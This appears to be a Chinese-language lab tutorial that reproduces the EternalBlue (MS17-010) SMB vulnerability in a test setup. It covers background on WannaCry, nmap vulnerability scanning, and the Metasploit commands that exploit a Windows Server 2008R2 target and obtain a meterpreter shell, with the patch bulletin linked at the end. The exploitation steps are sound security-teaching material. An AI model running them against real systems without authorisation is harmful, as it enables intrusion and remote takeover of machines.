永恒之蓝EternalBlue漏洞复现

永恒之蓝EternalBlue漏洞复现

1.背景

永恒之蓝(EternalBlue)是2017年4月14日晚,黑客团体Shadow
Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB协议漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

2.漏洞原理

永恒之蓝是在Windows的SMB服务处理SMB
v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

3.漏洞利用

3.1 漏洞扫描工具
Namap扫描工具:NMAP是一款强大的网络扫描安全监测工具,通过扫描网络 中不需要的服务端口来关闭这些服务,提高安全性。

metasploit扫描工具:Metasploit框架(简称MSF)是一个开源工具, 旨在方便渗透测试,它是由Ruby程序语言编 写的模板化框架,具有很好的 扩展性,便于渗透测试人员开发,使用定制的工具模板。该工具有六个模块, 分别为辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块 (post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块 (encoders),其中msf为总模块,其他均为分支模块。是一款开源安全漏洞 利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode, 并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架 下利用现有的Payload进行一系列的渗透测试。

3.2 漏洞复现
靶机:Windows server 2008R2(IP:192.168.179.129)
攻击机:Kali 2020(IP:192.168.179.128)
永恒之蓝EternalBlue漏洞复现_第1张图片
用nmap的漏洞扫描模式
nmap --script=vuln 192.168.179.129
可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。

永恒之蓝EternalBlue漏洞复现_第2张图片

永恒之蓝EternalBlue漏洞复现_第3张图片

打开metasploit
msfconsole
永恒之蓝EternalBlue漏洞复现_第4张图片

搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)
search ms17-010
永恒之蓝EternalBlue漏洞复现_第5张图片

加载扫描模块。(选项1)
use auxiliary/scanner/smb/smb_ms17_010

查看配置选项
show options
永恒之蓝EternalBlue漏洞复现_第6张图片

RHOSTS显示远程主机未配置,配置目标主机
set rhosts 192.168.179.129

在这里插入图片描述
永恒之蓝EternalBlue漏洞复现_第7张图片

开始扫描漏洞,再次证实靶机存在MS17-010漏洞
exploit
永恒之蓝EternalBlue漏洞复现_第8张图片

使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:set payload
在这里插入图片描述

查看选项并设置rhosts:set rhosts 192.168.179.129
在这里插入图片描述

输入exploit开始攻击。
永恒之蓝EternalBlue漏洞复现_第9张图片

运行成功会出现meterpreter >

3.2.3 攻击实例
捕获屏幕 meterpreter > screenshot

永恒之蓝EternalBlue漏洞复现_第10张图片
永恒之蓝EternalBlue漏洞复现_第11张图片

获得shell控制台:shell ,获取ip
永恒之蓝EternalBlue漏洞复现_第12张图片
4.修复方案
Microsoft 安全公告 MS17-010 - 严重:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

你可能感兴趣的:(安全,web安全,网络)